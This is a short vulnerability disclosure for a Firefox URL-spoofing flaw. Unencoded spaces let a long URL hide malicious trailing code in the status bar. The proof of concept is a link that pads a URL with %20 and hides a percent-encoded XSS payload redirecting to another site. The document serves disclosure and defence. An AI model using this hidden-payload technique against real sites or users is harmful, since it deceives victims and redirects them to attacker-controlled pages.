FIREFOX URL space character SPOOF



Vulnerability:
==============
Firefox browser address bar in dealing with the URL, the URL and the
status bar when the space character, there is no reasonable encoding
of the URL. Blank characters behind the malicious code will be hidden.
An attacker can construct a space with a long URL to the URL to
deceive.

Exploit:
==============
if other site there is a XSS vulnerability, such as:

<a href='http://127.0.0.1/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%73%63%72%69%70%74%3E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%67%2E%63%6E%27%3C%2F%73%63%72%69%70%74%3E'>test</a>

"http://127.0.0.1"; which there is a XSS. When you put the code
above, save it as a HMTL file, and then run. You can see the Firefox
status bar, malicious code has been hidden, because of space.While
convenient for users to view, but space is shielding the user's eyes.

I think the Firefox status bar in dealing with the space and the
address bar, it should be URL encoded. At the same time, the focus on
convenience, but also to focus on safety.

===============
xisigr[topsec]
xisigr@xxxxxxxxx



Relevant Pages

  • Re: Firefox and Opera on FC14 fail to access Globus site
    ... I can see the Menu Bar: ... - your machine talks directly to ISP? ... Just to avoid any surprises in your Firefox config, make sure there is no proxy ... $ whois www.globus.org ...
    (Fedora)
  • Re: New software release: Typer
    ... moving the mouse to click on Typer's icon bar icon, Firefox loses the ... caret, so nothing is tranferred to it's URL bar. ... All of the clickable fields on the browser page can be stepped to ...
    (comp.sys.acorn.apps)
  • Searching Google using Firefox Awesome Bar
    ... I'm facing an issue with the search feature of the Firefox awesome bar. ... Typing text on the awesome bar shows me the bookmarked and visited ...
    (Fedora)
  • Re: Website displays "correctly" in some browsers but not in others
    ... Firefox and Camino. ... Camino set to use a larger default text size. ... In Safari the menu text enlarges and reduces and the menu width changes, ... the menus will be more than the width of the menu bar, ...
    (comp.sys.mac.apps)
  • Re: The page cannot be displayed
    ... >> press CRTL F5 and the page refreshes with no problems. ... >> I can do the same thing with FireFox and Navigator. ... >> The problem is that typing http://www.llj-test.com/ into the address bar ...
    (microsoft.public.windows.inetexplorer.ie6.browser)